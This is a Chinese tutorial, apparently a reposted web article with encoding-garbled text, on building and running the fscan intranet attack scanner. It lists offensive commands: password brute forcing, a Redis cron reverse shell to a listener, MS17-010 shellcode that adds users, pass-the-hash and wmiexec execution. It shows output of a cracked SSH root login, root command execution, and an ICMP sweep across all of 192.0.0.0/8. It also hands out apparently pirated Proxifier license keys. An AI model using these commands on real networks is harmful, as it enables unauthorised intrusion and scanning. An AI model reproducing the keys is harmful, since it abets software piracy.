fscan安裝配置(windows、linux系統(tǒng))

1、簡介

fscan一款內(nèi)網(wǎng)綜合掃描工具，方便一鍵自動化、全方位漏掃掃描。
它支持主機存活探測、端口掃描、常見服務(wù)的爆破、ms17010、redis批量寫公鑰、計劃任務(wù)反彈shell、讀取win網(wǎng)卡信息、web指紋識別、web漏洞掃描、netbios探測、域控識別等功能。

2. 主要功能

1.信息搜集:

• 存活探測(icmp)
• 端口掃描

2.爆破功能:

• 各類服務(wù)爆破(ssh、smb、rdp等)
• 數(shù)據(jù)庫密碼爆破(mysql、mssql、redis、psql、oracle等)

3.系統(tǒng)信息、漏洞掃描:

• netbios探測、域控識別
• 獲取目標網(wǎng)卡信息
• 高危漏洞掃描(ms17010等)

4.Web探測功能:

• webtitle探測
• web指紋識別(常見cms、oa框架等)
• web漏洞掃描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

• redis寫公鑰或?qū)懹媱澣蝿?wù)
• ssh命令執(zhí)行
• ms17017利用(植入shellcode),如添加用戶等

6.其他功能:

• 文件保存

3. 使用說明

簡單用法

fscan.exe -h 192.168.1.1/24  (默認使用全部模塊)
fscan.exe -h 192.168.1.1/16  (B段掃描)

其他用法

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳過存活檢測 、不保存文件、跳過web poc掃描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計劃任務(wù)反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令執(zhí)行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模塊ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加載指定文件的用戶名、密碼來進行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定掃描結(jié)果保存路徑,默認保存在當前路徑) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看網(wǎng)段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密碼碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模塊)
fscan.exe -hf ip.txt  (以文件導(dǎo)入)
fscan.exe -u http://baidu.com -proxy 8080 (掃描單個url,并設(shè)置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不進行爆破,不掃Web poc,以減少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基礎(chǔ)上,加入3389->rdp掃描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持簡單tcp功能的代理,部分功能的庫不支持設(shè)置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (內(nèi)置添加用戶等功能,只適用于備選工具,更推薦其他ms17010的專項利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec無回顯命令執(zhí)行)

4、Linux系統(tǒng)安裝fscan及簡單使用

1、先下載go環(huán)境，因為fscan是用go語言編譯的。所以系統(tǒng)需要go語言環(huán)境；可以直接官網(wǎng)下載（直接百度go官網(wǎng)，然后Download找到Linux版本）或者直接命令下載（根據(jù)自己所需的環(huán)境下載對應(yīng)版本）

[root@localhost ~]# wget https://dl.google.com/go/go1.20.1.linux-amd64.tar.gz
#這里下載的是1.20版本，建議下載1.17版本之上的，因為后面有地方要求1.17版本以上

#解壓到/usr/local目錄下
[root@localhost ~]# tar -C /usr/local/ -zxvf go1.20.1.linux-amd64.tar.gz
#解壓成功可以在local文件夾下看到go文件夾
[root@localhost ~]# ls /usr/local/
bin  etc  games  go  include  lib  lib64  libexec  sbin  share  src
[root@localhost ~]# 

4.1、將 Go 二進制文件所在路徑加入到環(huán)境變量 PATH 中

root@localhost ~]# vi /etc/profile.d/go.sh

export GOROOT=/usr/local/go
export GOPATH=/data/go
export PATH=$PATH:$GOROOT/bin:$GOPATH
export GO111MODULE="on" 
export GOPROXY=https://goproxy.cn,direct

root@localhost ~]# source /etc/profile
#查看go環(huán)境是否搭建成功
[root@localhost ~]# go version
go version go1.20.1 linux/amd64
[root@localhost ~]# 

注意：輸入go version查看是否成功，若沒有出現(xiàn)版本號或者出現(xiàn)的是之前版本號，則輸入

cp -f $GOROOT/bin/go* /usr/bin/

將其覆蓋掉即可，再次輸入go version查看即可

4.2、下載和編譯安裝fscan

下載fscan二進制文件：

#注意由于github是國外網(wǎng)站，所以拉不下來是屬于正?，F(xiàn)象，可以自己去官網(wǎng)下載
[root@localhost ~]# git clone https://github.com/shadow1ng/fscan.git
Cloning into 'fscan'...
fatal: unable to access 'https://github.com/shadow1ng/fscan.git/': TCP connection reset by peer
[root@localhost ~]# 
[root@localhost ~]# 

#下載fscan
[root@localhost ~]# git clone https://github.com/shadow1ng/fscan.git
Cloning into 'fscan'...
remote: Enumerating objects: 2289, done.
remote: Counting objects: 100% (315/315), done.
remote: Compressing objects: 100% (114/114), done.
remote: Total 2289 (delta 223), reused 214 (delta 200), pack-reused 1974
Receiving objects: 100% (2289/2289), 13.51 MiB | 959.00 KiB/s, done.
Resolving deltas: 100% (1296/1296), done.

#下載完成后進入fscan目錄下打開終端，使用root權(quán)限進行編譯
[root@localhost ~]# ls
anaconda-ks.cfg  fscan  go1.20.1.linux-amd64.tar.gz
[root@localhost ~]# cd fscan/
[root@localhost fscan]# ls
common  go.mod  go.sum  image  LICENSE.txt  main.go  Plugins  README_EN.md  README.md  WebScan
[root@localhost fscan]# go build -ldflags="-s -w " -trimpath
go: downloading golang.org/x/net v0.7.0
go: downloading github.com/shadow1ng/goWMIExec v0.0.2
go: downloading github.com/denisenkom/go-mssqldb v0.12.2
go: downloading github.com/go-sql-driver/mysql v1.6.0
go: downloading github.com/hirochachacha/go-smb2 v1.1.0
go: downloading github.com/jlaffaye/ftp v0.0.0-20220829015825-b85cf1edccd4
go: downloading github.com/lib/pq v1.10.6
go: downloading github.com/sijms/go-ora/v2 v2.5.3
go: downloading github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8
go: downloading github.com/shadow1ng/grdp v1.0.3
go: downloading golang.org/x/crypto v0.3.0
go: downloading golang.org/x/text v0.7.0
go: downloading gopkg.in/yaml.v3 v3.0.1
go: downloading github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe
go: downloading github.com/golang-sql/sqlexp v0.1.0
go: downloading go.uber.org/zap v1.14.0
go: downloading github.com/hashicorp/go-multierror v1.1.1
go: downloading github.com/google/cel-go v0.13.0
go: downloading github.com/satori/go.uuid v1.2.0
go: downloading google.golang.org/genproto v0.0.0-20221027153422-115e99e71e1c
go: downloading google.golang.org/protobuf v1.28.1
go: downloading gopkg.in/yaml.v2 v2.4.0
go: downloading github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358
go: downloading github.com/icodeface/tls v0.0.0-20190904083142-17aec93c60e5
go: downloading github.com/lunixbochs/struc v0.0.0-20200707160740-784aaebc1d40
go: downloading go.uber.org/atomic v1.5.0
go: downloading go.uber.org/multierr v1.3.0
go: downloading github.com/hashicorp/errwrap v1.0.0
go: downloading github.com/stoewer/go-strcase v1.2.0
go: downloading github.com/geoffgarside/ber v1.1.0
go: downloading golang.org/x/sys v0.5.0
go: downloading github.com/antlr/antlr4/runtime/Go/antlr v1.4.10
[root@localhost fscan]# 

4.3、運行掃描測試

1、fscan.exe -h 192.168.x.x (全功能、ms17010、讀取網(wǎng)卡信息)

[root@localhost fscan]# ./fscan -h 192.168.134.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.134.130 is alive
(icmp) Target 192.168.134.2   is alive
(icmp) Target 192.168.134.1   is alive
(icmp) Target 192.168.134.131 is alive
[*] Icmp alive hosts len is: 4
192.168.134.131:445 open
192.168.134.131:80 open
192.168.134.1:445 open
192.168.134.131:21 open
192.168.134.131:139 open
192.168.134.130:22 open
192.168.134.1:139 open
192.168.134.131:135 open
192.168.134.1:135 open
192.168.134.1:7680 open
[*] alive ports len is: 10
start vulscan
[*] NetInfo:
[*]192.168.134.1
   [->]DESKTOP-TR23137
   [->]192.168.134.1
   [->]192.168.195.1
   [->]10.18.3.83  
[*] NetBios: 192.168.134.131 WORKGROUP\WIN-A1G22OHGPC0           Windows Server 2012 R2 Standard 9600 
[*] WebTitle: http://192.168.134.131    code:200 len:701    title:IIS Windows Server
[+] SSH:192.168.134.130:22:root 1
已完成 10/10
[*] 掃描結(jié)束,耗時: 27.61812334s
[root@localhost fscan]# 

2、fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 寫公鑰)

[root@localhost fscan]# ./fscan -h 192.168.134.130 -rf id_rsa.pub

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.134.130 is alive
[*] Icmp alive hosts len is: 1
192.168.134.130:22 open
[*] alive ports len is: 1
start vulscan
[+] SSH:192.168.134.130:22:root 1
已完成 1/1
[*] 掃描結(jié)束,耗時: 25.182541568s
[root@localhost fscan]# 

3、fscan.exe -h 192.168.x.x -c “whoami;id” (ssh 命令)

[root@localhost fscan]# ./fscan -h 192.168.134.130 -c "whoami;id"

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.134.130 is alive
[*] Icmp alive hosts len is: 1
192.168.134.130:22 open
[*] alive ports len is: 1
start vulscan
[+] SSH:192.168.134.130:22:root 1 
 root
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

已完成 1/1
[*] 掃描結(jié)束,耗時: 23.193620374s
[root@localhost fscan]# 

4、go run .\main.go -h 192.0.0.0/8 -m icmp(探測每個C段的網(wǎng)關(guān)和數(shù)個隨機IP,并統(tǒng)計top 10 B、C段存活數(shù)量)

(icmp) Target 192.253.247.67  is alive
(icmp) Target 192.163.164.5   is alive
(icmp) Target 192.229.126.5   is alive
(icmp) Target 192.234.93.254  is alive
(icmp) Target 192.234.237.5   is alive
[*] LiveTop 192.0.0.0/16     段存活數(shù)量為: 597
[*] LiveTop 192.3.0.0/16     段存活數(shù)量為: 399
[*] LiveTop 192.63.0.0/16    段存活數(shù)量為: 122
[*] LiveTop 192.24.0.0/16    段存活數(shù)量為: 99
[*] LiveTop 192.185.0.0/16   段存活數(shù)量為: 93
[*] LiveTop 192.228.0.0/16   段存活數(shù)量為: 86
[*] LiveTop 192.181.0.0/16   段存活數(shù)量為: 80
[*] LiveTop 192.142.0.0/16   段存活數(shù)量為: 61
[*] LiveTop 192.226.0.0/16   段存活數(shù)量為: 54
[*] LiveTop 192.180.0.0/16   段存活數(shù)量為: 54
[*] LiveTop 192.0.76.0/24    段存活數(shù)量為: 10
[*] LiveTop 192.0.66.0/24    段存活數(shù)量為: 10
[*] LiveTop 192.0.79.0/24    段存活數(shù)量為: 10
[*] LiveTop 192.0.78.0/24    段存活數(shù)量為: 10
[*] LiveTop 192.0.72.0/24    段存活數(shù)量為: 10
[*] LiveTop 192.0.63.0/24    段存活數(shù)量為: 10
[*] LiveTop 192.0.54.0/24    段存活數(shù)量為: 10
[*] LiveTop 192.0.77.0/24    段存活數(shù)量為: 10
[*] LiveTop 192.0.65.0/24    段存活數(shù)量為: 10
[*] LiveTop 192.0.73.0/24    段存活數(shù)量為: 10
[*] Icmp alive hosts len is: 3800
[*] 掃描結(jié)束,耗時: 23.913910306s
[root@localhost fscan]# 

5、windows系統(tǒng)安裝配置及簡單使用(適用于大部分windows版本)

首先，因為fscan是用go語言編譯的。所以系統(tǒng)是需要go語言環(huán)境

• 在這里有一個問題，如果是為了使用fscan的話，go環(huán)境的版本需要配置高版本。我這里使用的是1.20版本，安裝低版本會出現(xiàn)各種問題。

go 環(huán)境的安裝配置在windows上了可以選擇用msi文件安裝。下面附上下載鏈接:https://go.dev/dl/

5.1、在系統(tǒng)上安裝一個go環(huán)境,在官網(wǎng)上獲取包

5.1.1下載完成雙擊進行安裝

直接雙擊點，然后默認繼續(xù)就可以，不用更改什么東西，你可以選擇自定義安裝目錄。不過默認的是在C:/Program file/Go,而且使用msi安裝方式是不用自己配置環(huán)境變量，他自動就配置完了。

5.1.2 查看go環(huán)境版本

go version

5.2下載Fscan

在GitHub上下載fscan,源碼鏈接:https://github.com/shadow1ng/fscan

解壓整個包即可，大家會發(fā)現(xiàn)解壓后在項目中并沒有fscan.exe文件，因為這個exe文件時需要編譯生成的，并不是自帶的。

在編譯生成fscan.exe可執(zhí)行文件之前，還有幾個步驟需要執(zhí)行。

5.3 下載安裝 proxifier

下載鏈接: https://www.proxifier.com/download/

這里安裝完成后的proxfier是一個試用版，需要激活密鑰，這里給大家直接提供，根據(jù)環(huán)境自行選擇

proxfier的激活秘鑰是:
And his activation key is:

L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C（Portable Edition）#免安裝版本
L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C (便攜版) # 免安裝版本

5EZ8G-C3WL5-B56YG-SCXM9-6QZAP（Standard Edition）#安裝版本
5EZ8G-C3WL5-B56YG-SCXM9-6QZAP (標準版) # 安裝版本

P427L-9Y552-5433E-8DSR3-58Z68（MAC） #mac版本 ；
P427L-9Y552-5433E-8DSR3-58Z68(MAC) # MAC 版本;

5.4編譯安裝fscan

初次安裝，生成fscan.exe文件報錯。運行 **go build**命令時，因為權(quán)限不足無法在指定的路徑下創(chuàng)建可執(zhí)行文件。原因是系統(tǒng)不知道編譯好的exe文件應(yīng)該放在哪里，因此放在臨時文件夾里，但臨時文件（%temp%）沒有足夠的讀寫權(quán)限。即使在設(shè)置中給了權(quán)限仍提示拒絕訪問。

解決方案
設(shè)置輸出編譯好的exe文件存放路徑，指明要編譯哪個go文件

• 1、以管理員身份運行命令提示符（在開始菜單中搜索 cmd，右鍵選擇“以管理員身份運行”），然后再運行 go build 命令。
• 2、將 go build 命令生成可執(zhí)行文件的路徑改為當前用戶擁有寫入權(quán)限的其他目錄，例如你的用戶主目錄（%USERPROFILE%）或其他自定義目錄，例如 D:\MyPrograms。可以通過在 go build 命令中使用 o 選項來指定輸出路徑，例如：go build -o D:\MyPrograms\myprogram.exe。
• 3、檢查你的殺毒軟件或安全設(shè)置是否阻止了程序生成可執(zhí)行文件。你可以嘗試禁用殺毒軟件或調(diào)整安全設(shè)置，然后重新運行 go build 命令。

注意：請不要將輸出路徑設(shè)置為系統(tǒng)目錄或其他重要目錄，否則可能會對系統(tǒng)或其他程序造成損害。

執(zhí)行成功，查看文件中有沒有生成對應(yīng)的exe文件

fscan執(zhí)行成功，可以愉快地進行漏掃了。

文章來源地址http://www.zghlxwxcb.cn/news/detail-604027.html

到了這里，關(guān)于fscan安裝配置(windows、linux系統(tǒng))的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！